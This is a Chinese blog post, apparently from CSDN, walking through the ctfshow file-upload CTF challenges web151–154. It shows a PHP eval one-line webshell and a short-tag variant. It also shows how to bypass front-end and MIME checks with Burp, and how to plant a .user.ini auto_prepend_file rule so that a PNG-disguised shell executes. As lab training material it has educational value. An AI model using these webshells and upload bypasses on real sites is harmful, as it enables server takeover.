ctfshow 文件上传web151————

已于 2024-08-12 15:56:27 修改
阅读量264 收藏 4
点赞数 11
分类专栏: ctf 文章标签: php web安全
于 2024-08-10 16:45:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75289892/article/details/141092183
版权

web151

题目提示前端校验

F12查看前端代码,更改上传文件类型png为php,以便我们上传php后缀的代码文件。

写一句话木马,先命名为.txt,再更改为php后缀:

<?php @eval($_POST[123]); ?>

上传成功,得到上传的路径

查看根目录,没找到想要的文件名

再往当前文件的上级目录找

找到flag.php,访问即可

web152

像上题一样更改前端校验,上传php文件显示不符合上传类型。

需要上传规定的png文件,把上一题的php后缀改成png,再上传

得到上传到的路径

用bp抓包,修改png为php,才能使后台执行我们上传的代码,再点击send

POST传参如下,得到文件名flag.php

访问文件,得到flag

web153

采用上一题的方法上传png,在bp中修改为php后缀,回显错误。

又尝试修改为phP,还是上传错误,只能通过其他方法间接上传

nginx中有一个.user.ini文件:

.user.ini文件通常位于PHP安装目录的根目录下。当网站进行扫描时,会将.user.ini文件指向路径的内容包含在首页文件处

auto_prepend_file:表示在每个PHP脚本之前自动加载指定的文件。例如auto_prepend_file=111.png

auto_append_file:与auto_prepend_file类似,但内容将添加到PHP脚本的末尾。例如,auto_append_file=111.png

思路:

我们可以上传一个.user.ini文件,文件内容是auto_prepend_file=111.png,这样能成功执行文件内容,进而上传我们想要执行的内容。

首先还是上传111.png,内容是一句话木马:

<?php @eval($_POST[123]); ?>

创建一个.user.ini文件,并上传

bp抓包,添加.user.ini的文件内容

auto_prepend_file=111.png

显示文件上传成功,那么我们的一句话木马也上传成功 

.user.ini上传到了index.php文件,一句话木马也在里面,需要在这个文件下进行post传参。

得到文件名

访问flag.php文件,得到flag

 

web154 

还是和上题一样,上传user.ini,但显示格式不对,那么在文件名后面加上png后缀,再上传。

 bp抓包,更改文件名,去掉后缀,并添加上命令

auto_prepend_file=111.png

 发送后得到上传成功的显示:

然后和上题相同。上传内容为一句话木马的png文件,但显示文件内容不符合,可见对上传的内容进行了限制

删除一句话木马中的php后,显示上传成功,可见该题限制了上传内容不能有php

一句话木马,不使用php,就使用短标签,相当于是简写形式:

<?=eval($_POST[123]);?>

访问/upload/index.php,POST传参,得到flag.php

再访问flag.php

-

8023220
关注
  • 11
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ctfshow]web入门——文件上传web156-web163)
ShenZ的博客
03-18 5502
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow——web入门——文件上传
h_adam的博客
02-17 5005
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
CTFshow web入门——文件上传
小元砸的博客
03-14 1万+
Web 151
CTFshow_Web_文件上传——web151~web170
Ho1aAs‘s Blog
04-26 2425
文章目录工具题解Web 151~152Web 153Web 154Web 155Web 156Web 157~158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168~170完 工具 Burpsuite php 题解 Web 151~152 页面上,伪装成jpg的一句话木马无法上传,提示前后端验证 抓包,修改filename为xxx.php,MIME类型image/png 读取flag直接用通配符 # 151.ph
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1683
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
ctfshow——文件上传
qq_55202378的博客
12-27 1298
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFShow web1-7——CTF秀WEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2341
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞之 XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
CTFSHOW web入门——web37
m0_74093152的博客
04-24 284
include包含变量c,因此可以利用文件包含漏洞,让变量c变成php代码,然后通过include函数执行。可以使用data协议获取flag.php文件中的内容。上传payload:?过滤了flag,即c中不能有flag字段。
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
LNMP环境搭建论坛
qq_63652578的博客
08-07 991
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
最新发布
2301_81462177的博客
08-09 279
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1042
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
ctfhub文件包含
a666666688的博客
08-07 497
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
ctfshow web入门文件上传
09-29
文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上传图片时,可以同时上传一个名为.user.ini的文件,并在其中设置auto_append_file参数来包含木马文件。这样,每个PHP文件都会包含我们上传的恶意代码。 另一种方法是通过修改上传文件的Content-Type来绕过服务器对文件类型的过滤。比如,可以先上传一个zip文件,然后通过抓包工具修改请求的Content-Type为image/png,并将文件内容过滤的敏感字符替换掉,这样就能成功上传php等格式的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值